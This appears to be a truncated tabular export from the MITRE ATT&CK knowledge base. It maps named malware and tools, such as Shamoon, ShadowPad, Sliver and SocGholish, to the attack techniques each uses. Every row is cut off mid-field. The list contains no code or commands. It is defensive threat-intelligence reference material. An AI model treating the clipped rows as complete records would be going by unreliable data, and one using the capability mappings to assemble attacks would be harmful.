S1099 Samurai malware--asoftware uses T1012 Query Regiattack-pat technique [Samurai](
S1099 Samurai malware--asoftware uses T1518 Software Dattack-pat technique [Samurai](h
S1099 Samurai malware--asoftware uses T1132.001Standard Eattack-pat technique [Samurai](h
S1099 Samurai malware--asoftware uses T1573.001Symmetric attack-pat technique [Samurai](
S1099 Samurai malware--asoftware uses T1071.001Web Protocattack-pat technique [Samurai](h
S1099 Samurai malware--asoftware uses T1059.003Windows Cattack-pat technique [Samurai](
S1099 Samurai malware--asoftware uses T1543.003Windows Se attack-pat technique [Samurai](
S1085 Sardonic malware-- software uses T1573.002Asymmetricattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1055.004Asynchronoattack-pat technique [Sardonic]
S1085 Sardonic malware-- software uses T1027.010Command aOttack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1005 Data from attack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1140 Deobfuscatattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1070 Indicator attack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1105 Ingress Tooattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1106 Native API attack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1135 Network Shattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1095 Non-Applicattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1571 Non-Standaattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1027 Obfuscatedattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1059.001PowerShellattack-pat technique [Sardonic]
S1085 Sardonic malware-- software uses T1057 Process Di attack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1620 Reflective attack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1132.001Standard Eattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1573.001Symmetric attack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1082 System Inf attack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1016 System Netattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1049 System Netattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1007 System Serattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1059.003Windows Cattack-pat technique [Sardonic](
S1085 Sardonic malware-- software uses T1047 Windows M attack-pat technique [Sardonic]
S1085 Sardonic malware-- software uses T1546.003Windows Ma attack-pat technique [Sardonic](
S0053 SeaDuke malware-- software uses T1560.002Archive viaattack-pat technique [SeaDuke](h
S0053 SeaDuke malware-- software uses T1070.004File Deleti attack-pat technique [SeaDuke](h
S0053 SeaDuke malware-- software uses T1105 Ingress Tooattack-pat technique [SeaDuke](h
S0053 SeaDuke malware-- software uses T1550.003Pass the Tiattack-pat technique Some [SeaD
S0053 SeaDuke malware-- software uses T1059.001PowerShellattack-pat technique [SeaDuke](
S0053 SeaDuke malware-- software uses T1547.001Registry Ruattack-pat technique [SeaDuke](h
S0053 SeaDuke malware-- software uses T1114.002Remote Ema attack-pat technique Some [SeaD
S0053 SeaDuke malware-- software uses T1547.009Shortcut Mattack-pat technique [SeaDuke](h
S0053 SeaDuke malware-- software uses T1027.002Software Pattack-pat technique [SeaDuke](
S0053 SeaDuke malware-- software uses T1132.001Standard Eattack-pat technique [SeaDuke](h
S0053 SeaDuke malware-- software uses T1573.001Symmetric attack-pat technique [SeaDuke](h
S0053 SeaDuke malware-- software uses T1078 Valid Acco attack-pat technique Some [SeaD
S0053 SeaDuke malware-- software uses T1071.001Web Protocattack-pat technique [SeaDuke](
S0053 SeaDuke malware-- software uses T1059.003Windows Cattack-pat technique [SeaDuke](
S0053 SeaDuke malware-- software uses T1546.003Windows Ma attack-pat technique [SeaDuke](h
S0345 Seasalt malware-- software uses T1027.013Encrypted/attack-pat technique [Seasalt](h
S0345 Seasalt malware-- software uses T1070.004File Deleti attack-pat technique [Seasalt](h
S0345 Seasalt malware-- software uses T1083 File and Di attack-pat technique [Seasalt](h
S0345 Seasalt malware-- software uses T1105 Ingress Tooattack-pat technique [Seasalt](
S0345 Seasalt malware-- software uses T1036.004Masquerade attack-pat technique [Seasalt](h
S0345 Seasalt malware-- software uses T1057 Process Di attack-pat technique [Seasalt](h
S0345 Seasalt malware-- software uses T1547.001Registry Ruattack-pat technique [Seasalt](
S0345 Seasalt malware-- software uses T1071.001Web Protocattack-pat technique [Seasalt](
S0345 Seasalt malware-- software uses T1059.003Windows Cattack-pat technique [Seasalt](h
S0345 Seasalt malware-- software uses T1543.003Windows Se attack-pat technique [Seasalt](h
S0382 ServHelpermalware-- software uses T1098.007Additional attack-pat technique [ServHelpe
S0382 ServHelpermalware-- software uses T1573.002Asymmetricattack-pat technique [ServHelper
S0382 ServHelpermalware-- software uses T1070.004File Deleti attack-pat technique [ServHelper
S0382 ServHelpermalware-- software uses T1105 Ingress Tooattack-pat technique [ServHelper
S0382 ServHelpermalware-- software uses T1136.001Local Acco attack-pat technique [ServHelpe
S0382 ServHelpermalware-- software uses T1036.010Masqueradattack-pat technique [ServHelpe
S0382 ServHelpermalware-- software uses T1059.001PowerShellattack-pat technique [ServHelper
S0382 ServHelpermalware-- software uses T1547.001Registry Ruattack-pat technique [ServHelpe
S0382 ServHelpermalware-- software uses T1021.001Remote Des attack-pat technique [ServHelper
S0382 ServHelpermalware-- software uses T1218.011Rundll32 attack-pat technique [ServHelpe
S0382 ServHelpermalware-- software uses T1053.005Scheduled attack-pat technique [ServHelper
S0382 ServHelpermalware-- software uses T1082 System Inf attack-pat technique [ServHelpe
S0382 ServHelpermalware-- software uses T1033 System Own attack-pat technique [ServHelper
S0382 ServHelpermalware-- software uses T1071.001Web Protocattack-pat technique [ServHelper
S0382 ServHelpermalware-- software uses T1059.003Windows Cattack-pat technique [ServHelper
S0639 Seth-Lockemalware-- software uses T1486 Data Encryattack-pat technique [Seth-Locke
S0639 Seth-Lockemalware-- software uses T1105 Ingress Tooattack-pat technique [Seth-Lock
S0639 Seth-Lockemalware-- software uses T1059.003Windows Cattack-pat technique [Seth-Lock
S0596 ShadowPa malware-- software uses T1071.004DNS attack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1140 Deobfuscatattack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1568.002Domain Gen attack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1055.001Dynamic-linattack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1071.002File Transf attack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1027.011Fileless St attack-pat technique [ShadowPad]
S0596 ShadowPa malware-- software uses T1070 Indicator attack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1105 Ingress Tooattack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1112 Modify Regattack-pat technique [ShadowPad]
S0596 ShadowPa malware-- software uses T1095 Non-Applicattack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1132.002Non-Standaattack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1027 Obfuscatedattack-pat technique [ShadowPad]
S0596 ShadowPa malware-- software uses T1057 Process Di attack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1055 Process Injattack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1029 Scheduled attack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1082 System Inf attack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1016 System Netattack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1033 System Own attack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1124 System Timattack-pat technique [ShadowPad
S0596 ShadowPa malware-- software uses T1071.001Web Protocattack-pat technique [ShadowPad
S0140 Shamoon malware-- software uses T1548.002Bypass Useattack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1485 Data Destrattack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1486 Data Encryattack-pat technique [Shamoon](h
S0140 Shamoon malware-- software uses T1140 Deobfuscatattack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1561.002Disk Struc attack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1078.002Domain Acattack-pat technique If [Shamoon
S0140 Shamoon malware-- software uses T1105 Ingress Tooattack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1570 Lateral Tooattack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1036.004Masquerade attack-pat technique [Shamoon](h
S0140 Shamoon malware-- software uses T1112 Modify Regattack-pat technique Once [Sham
S0140 Shamoon malware-- software uses T1027 Obfuscatedattack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1012 Query Regiattack-pat technique [Shamoon](h
S0140 Shamoon malware-- software uses T1018 Remote Sysattack-pat technique [Shamoon](h
S0140 Shamoon malware-- software uses T1021.002SMB/Windo attack-pat technique [Shamoon](h
S0140 Shamoon malware-- software uses T1053.005Scheduled attack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1569.002Service Ex attack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1082 System Inf attack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1016 System Netattack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1529 System Sh attack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1124 System Timattack-pat technique [Shamoon](h
S0140 Shamoon malware-- software uses T1070.006Timestompattack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1134.001Token Impeattack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1071.001Web Protocattack-pat technique [Shamoon](
S0140 Shamoon malware-- software uses T1543.003Windows Se attack-pat technique [Shamoon](
S1019 Shark malware--9software uses T1071.004DNS attack-pat technique [Shark](ht
S1019 Shark malware--9software uses T1074 Data Stageattack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1005 Data from attack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1140 Deobfuscatattack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1568.002Domain Gen attack-pat technique [Shark](ht
S1019 Shark malware--9software uses T1027.013Encrypted/attack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1041 Exfiltratio attack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1008 Fallback C attack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1070.004File Deleti attack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1105 Ingress Tooattack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1036.005Match Legiattack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1012 Query Regiattack-pat technique [Shark](ht
S1019 Shark malware--9software uses T1029 Scheduled attack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1497.001System Cheattack-pat technique [Shark](htt
S1019 Shark malware--9software uses T1082 System Inf attack-pat technique [Shark](ht
S1019 Shark malware--9software uses T1071.001Web Protocattack-pat technique [Shark](ht
S1019 Shark malware--9software uses T1059.003Windows Cattack-pat technique [Shark](ht
S1089 SharpDiscomalware--1software uses T1005 Data from attack-pat technique [SharpDisco
S1089 SharpDiscomalware--1software uses T1041 Exfiltratio attack-pat technique [SharpDisco
S1089 SharpDiscomalware--1software uses T1071.002File Transf attack-pat technique [SharpDisc
S1089 SharpDiscomalware--1software uses T1083 File and Di attack-pat technique [SharpDisc
S1089 SharpDiscomalware--1software uses T1564.003Hidden Wi attack-pat technique [SharpDisc
S1089 SharpDiscomalware--1software uses T1105 Ingress Tooattack-pat technique [SharpDisc
S1089 SharpDiscomalware--1software uses T1106 Native API attack-pat technique [SharpDisco
S1089 SharpDiscomalware--1software uses T1120 Peripheral attack-pat technique [SharpDisco
S1089 SharpDiscomalware--1software uses T1053.005Scheduled attack-pat technique [SharpDisco
S1089 SharpDiscomalware--1software uses T1082 System Inf attack-pat technique [SharpDisc
S1089 SharpDiscomalware--1software uses T1059.003Windows Cattack-pat technique [SharpDisc
S0546 SharpStagemalware-- software uses T1140 Deobfuscatattack-pat technique [SharpStag
S0546 SharpStagemalware-- software uses T1105 Ingress Tooattack-pat technique [SharpStag
S0546 SharpStagemalware-- software uses T1059.001PowerShellattack-pat technique [SharpStag
S0546 SharpStagemalware-- software uses T1547.001Registry Ruattack-pat technique [SharpStage
S0546 SharpStagemalware-- software uses T1053.005Scheduled attack-pat technique [SharpStage
S0546 SharpStagemalware-- software uses T1113 Screen Capattack-pat technique [SharpStage
S0546 SharpStagemalware-- software uses T1082 System Inf attack-pat technique [SharpStage
S0546 SharpStagemalware-- software uses T1614.001System Lanattack-pat technique [SharpStag
S0546 SharpStagemalware-- software uses T1102 Web Servicattack-pat technique [SharpStage
S0546 SharpStagemalware-- software uses T1059.003Windows Cattack-pat technique [SharpStag
S0546 SharpStagemalware-- software uses T1047 Windows M attack-pat technique [SharpStag
S0444 ShimRat malware-- software uses T1546.011Applicatio attack-pat technique [ShimRat](
S0444 ShimRat malware-- software uses T1548.002Bypass Useattack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1005 Data from attack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1140 Deobfuscatattack-pat technique [ShimRat](
S0444 ShimRat malware-- software uses T1090.002External Prattack-pat technique [ShimRat](
S0444 ShimRat malware-- software uses T1008 Fallback C attack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1070.004File Deleti attack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1083 File and Di attack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1574 Hijack Exe attack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1105 Ingress Tooattack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1036.004Masquerade attack-pat technique [ShimRat](
S0444 ShimRat malware-- software uses T1112 Modify Regattack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1106 Native API attack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1135 Network Shattack-pat technique [ShimRat](
S0444 ShimRat malware-- software uses T1027 Obfuscatedattack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1547.001Registry Ruattack-pat technique [ShimRat](
S0444 ShimRat malware-- software uses T1029 Scheduled attack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1027.002Software Pattack-pat technique [ShimRat](h
S0444 ShimRat malware-- software uses T1071.001Web Protocattack-pat technique [ShimRat](
S0444 ShimRat malware-- software uses T1059.003Windows Cattack-pat technique [ShimRat](
S0444 ShimRat malware-- software uses T1543.003Windows Se attack-pat technique [ShimRat](h
S0445 ShimRatRetool--115f software uses T1087 Account Diattack-pat technique [ShimRatRep
S0445 ShimRatRetool--115f software uses T1560 Archive Coattack-pat technique [ShimRatRep
S0445 ShimRatRetool--115f software uses T1119 Automatedattack-pat technique [ShimRatRep
S0445 ShimRatRetool--115f software uses T1020 Automatedattack-pat technique [ShimRatRe
S0445 ShimRatRetool--115f software uses T1041 Exfiltratio attack-pat technique [ShimRatRe
S0445 ShimRatRetool--115f software uses T1105 Ingress Tooattack-pat technique [ShimRatRe
S0445 ShimRatRetool--115f software uses T1036.005Match Legiattack-pat technique [ShimRatRe
S0445 ShimRatRetool--115f software uses T1106 Native API attack-pat technique [ShimRatRe
S0445 ShimRatRetool--115f software uses T1027 Obfuscatedattack-pat technique [ShimRatRep
S0445 ShimRatRetool--115f software uses T1069 Permissionattack-pat technique [ShimRatRep
S0445 ShimRatRetool--115f software uses T1057 Process Di attack-pat technique [ShimRatRe
S0445 ShimRatRetool--115f software uses T1518 Software Dattack-pat technique [ShimRatRep
S0445 ShimRatRetool--115f software uses T1082 System Inf attack-pat technique [ShimRatRe
S0445 ShimRatRetool--115f software uses T1016 System Netattack-pat technique [ShimRatRep
S0445 ShimRatRetool--115f software uses T1049 System Netattack-pat technique [ShimRatRe
S0445 ShimRatRetool--115f software uses T1071.001Web Protocattack-pat technique [ShimRatRe
S0589 Sibot malware-- software uses T1027.010Command aOttack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1140 Deobfuscatattack-pat technique [Sibot](htt
S0589 Sibot malware-- software uses T1070.004File Deleti attack-pat technique [Sibot](htt
S0589 Sibot malware-- software uses T1027.011Fileless St attack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1070 Indicator attack-pat technique [Sibot](htt
S0589 Sibot malware-- software uses T1105 Ingress Tooattack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1036.005Match Legiattack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1112 Modify Regattack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1218.005Mshta attack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1012 Query Regiattack-pat technique [Sibot](htt
S0589 Sibot malware-- software uses T1218.011Rundll32 attack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1053.005Scheduled attack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1016 System Netattack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1049 System Netattack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1059.005Visual Basiattack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1071.001Web Protocattack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1102 Web Servicattack-pat technique [Sibot](ht
S0589 Sibot malware-- software uses T1047 Windows M attack-pat technique [Sibot](ht
S0610 SideTwist malware--dsoftware uses T1001 Data Obfusattack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1005 Data from attack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1140 Deobfuscatattack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1041 Exfiltratio attack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1008 Fallback C attack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1083 File and Di attack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1105 Ingress Tooattack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1106 Native API attack-pat technique [SideTwist
S0610 SideTwist malware--dsoftware uses T1132.001Standard Eattack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1573.001Symmetric attack-pat technique [SideTwist
S0610 SideTwist malware--dsoftware uses T1082 System Inf attack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1016 System Netattack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1033 System Own attack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1071.001Web Protocattack-pat technique [SideTwist]
S0610 SideTwist malware--dsoftware uses T1059.003Windows Cattack-pat technique [SideTwist
S0623 Siloscape malware-- software uses T1071 Applicationattack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1609 Container attack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1140 Deobfuscatattack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1611 Escape to attack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1190 Exploit Pubattack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1068 Exploitatioattack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1083 File and Di attack-pat technique [Siloscape
S0623 Siloscape malware-- software uses T1090.003Multi-hop attack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1106 Native API attack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1027 Obfuscatedattack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1069 Permissionattack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1518 Software Dattack-pat technique [Siloscape]
S0623 Siloscape malware-- software uses T1134.001Token Impeattack-pat technique [Siloscape
S0623 Siloscape malware-- software uses T1059.003Windows Cattack-pat technique [Siloscape]
S0007 Skeleton K malware--8software uses T1556.001Domain Con attack-pat technique [Skeleton K
S0468 Skidmap malware-- software uses T1496.001Compute Hiattack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1053.003Cron attack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1140 Deobfuscatattack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1562.001Disable or attack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1027.013Encrypted/attack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1083 File and Di attack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1105 Ingress Tooattack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1547.006Kernel Modattack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1036.005Match Legiattack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1556.003Pluggable attack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1057 Process Di attack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1014 Rootkit attack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1098.004SSH Authorattack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1518.001Security S attack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1082 System Inf attack-pat technique [Skidmap](h
S0468 Skidmap malware-- software uses T1059.004Unix Shell attack-pat technique [Skidmap](
S0633 Sliver tool--11f software uses T1134 Access Tokattack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1573.002Asymmetricattack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1071.004DNS attack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1027.013Encrypted/attack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1041 Exfiltratio attack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1083 File and Di attack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1105 Ingress Tooattack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1055 Process Injattack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1113 Screen Capattack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1132.001Standard Eattack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1001.002Steganogr attack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1573.001Symmetric attack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1016 System Netattack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1049 System Netattack-pat technique [Sliver](ht
S0633 Sliver tool--11f software uses T1071.001Web Protocattack-pat technique [Sliver](h
S1035 Small Sievemalware-- software uses T1573.002Asymmetricattack-pat technique [Small Sie
S1035 Small Sievemalware-- software uses T1102.002Bidirectio attack-pat technique [Small Siev
S1035 Small Sievemalware-- software uses T1480 Execution attack-pat technique [Small Siev
S1035 Small Sievemalware-- software uses T1105 Ingress Tooattack-pat technique [Small Siev
S1035 Small Sievemalware-- software uses T1036.005Match Legiattack-pat technique [Small Siev
S1035 Small Sievemalware-- software uses T1132.002Non-Standaattack-pat technique [Small Sie
S1035 Small Sievemalware-- software uses T1027 Obfuscatedattack-pat technique [Small Sie
S1035 Small Sievemalware-- software uses T1059.006Python attack-pat technique [Small Sie
S1035 Small Sievemalware-- software uses T1547.001Registry Ruattack-pat technique [Small Siev
S1035 Small Sievemalware-- software uses T1016 System Netattack-pat technique [Small Siev
S1035 Small Sievemalware-- software uses T1033 System Own attack-pat technique [Small Siev
S1035 Small Sievemalware-- software uses T1071.001Web Protocattack-pat technique [Small Sie
S1035 Small Sievemalware-- software uses T1059.003Windows Cattack-pat technique [Small Sie
S0226 Smoke Loamalware--0software uses T1552.001Credentialsattack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1555.003Credential attack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1140 Deobfuscatattack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1027.013Encrypted/attack-pat technique [Smoke Loa
S0226 Smoke Loamalware--0software uses T1083 File and Di attack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1105 Ingress Tooattack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1114.001Local Emailattack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1055.012Process Hoattack-pat technique [Smoke Loa
S0226 Smoke Loamalware--0software uses T1055 Process Injattack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1547.001Registry Ruattack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1053.005Scheduled attack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1497.001System Cheattack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1059.005Visual Basiattack-pat technique [Smoke Load
S0226 Smoke Loamalware--0software uses T1071.001Web Protocattack-pat technique [Smoke Loa
S1086 Snip3 malware--4software uses T1027.001Binary Padattack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1140 Deobfuscatattack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1189 Drive-by C attack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1564.003Hidden Wi attack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1105 Ingress Tooattack-pat technique [Snip3](ht
S1086 Snip3 malware--4software uses T1204.002Malicious Fattack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1204.001Malicious Lattack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1104 Multi-Stag attack-pat technique [Snip3](ht
S1086 Snip3 malware--4software uses T1027 Obfuscatedattack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1059.001PowerShellattack-pat technique [Snip3](htt
[Snip3](https://attack.mitre.o
S1086 Snip3 malware--4software uses T1055.012Process Hoattack-pat technique
S1086 Snip3 malware--4software uses T1547.001Registry Ruattack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1566.001Spearphishattack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1566.002Spearphishattack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1497.001System Cheattack-pat technique [Snip3](ht
S1086 Snip3 malware--4software uses T1082 System Inf attack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1497.003Time Basedattack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1059.005Visual Basiattack-pat technique [Snip3](htt
S1086 Snip3 malware--4software uses T1102 Web Servicattack-pat technique [Snip3](ht
S1086 Snip3 malware--4software uses T1047 Windows M attack-pat technique [Snip3](ht
S1124 SocGholishmalware-- software uses T1482 Domain Truattack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1189 Drive-by C attack-pat technique [SocGholis
S1124 SocGholishmalware-- software uses T1027.013Encrypted/attack-pat technique The [SocGho
S1124 SocGholishmalware-- software uses T1048.003Exfiltrati attack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1105 Ingress Tooattack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1059.007JavaScript attack-pat technique The [SocGho
S1124 SocGholishmalware-- software uses T1074.001Local Data attack-pat technique [SocGholis
S1124 SocGholishmalware-- software uses T1204.001Malicious Lattack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1036.005Match Legiattack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1057 Process Di attack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1518 Software Dattack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1566.002Spearphishattack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1082 System Inf attack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1614 System Locattack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1016 System Netattack-pat technique [SocGholish
S1124 SocGholishmalware-- software uses T1033 System Own attack-pat technique [SocGholis
S1124 SocGholishmalware-- software uses T1102 Web Servicattack-pat technique [SocGholis
S1124 SocGholishmalware-- software uses T1047 Windows M attack-pat technique [SocGholish
S0273 Socksbot malware-- software uses T1055.001Dynamic-linattack-pat technique [Socksbot](
S0273 Socksbot malware-- software uses T1059.001PowerShellattack-pat technique [Socksbot](
S0273 Socksbot malware-- software uses T1057 Process Di attack-pat technique [Socksbot](
S0273 Socksbot malware-- software uses T1090 Proxy attack-pat technique [Socksbot]
S0273 Socksbot malware-- software uses T1113 Screen Capattack-pat technique [Socksbot]
S0627 SodaMastemalware-- software uses T1573.002Asymmetricattack-pat technique [SodaMaster
S0627 SodaMastemalware-- software uses T1105 Ingress Tooattack-pat technique [SodaMaster
S0627 SodaMastemalware-- software uses T1106 Native API attack-pat technique [SodaMaste
S0627 SodaMastemalware-- software uses T1027 Obfuscatedattack-pat technique [SodaMaster
S0627 SodaMastemalware-- software uses T1057 Process Di attack-pat technique [SodaMaster
S0627 SodaMastemalware-- software uses T1012 Query Regiattack-pat technique [SodaMaster
S0627 SodaMastemalware-- software uses T1573.001Symmetric attack-pat technique [SodaMaste
S0627 SodaMastemalware-- software uses T1497.001System Cheattack-pat technique [SodaMaste
S0627 SodaMastemalware-- software uses T1082 System Inf attack-pat technique [SodaMaste
S0627 SodaMastemalware-- software uses T1033 System Own attack-pat technique [SodaMaste
S0627 SodaMastemalware-- software uses T1497.003Time Basedattack-pat technique [SodaMaster
S0615 SombRAT malware-- software uses T1560.003Archive vi attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1573.002Asymmetricattack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1071.004DNS attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1005 Data from attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1140 Deobfuscatattack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1568.002Domain Gen attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1055.001Dynamic-linattack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1041 Exfiltratio attack-pat technique [SombRAT](
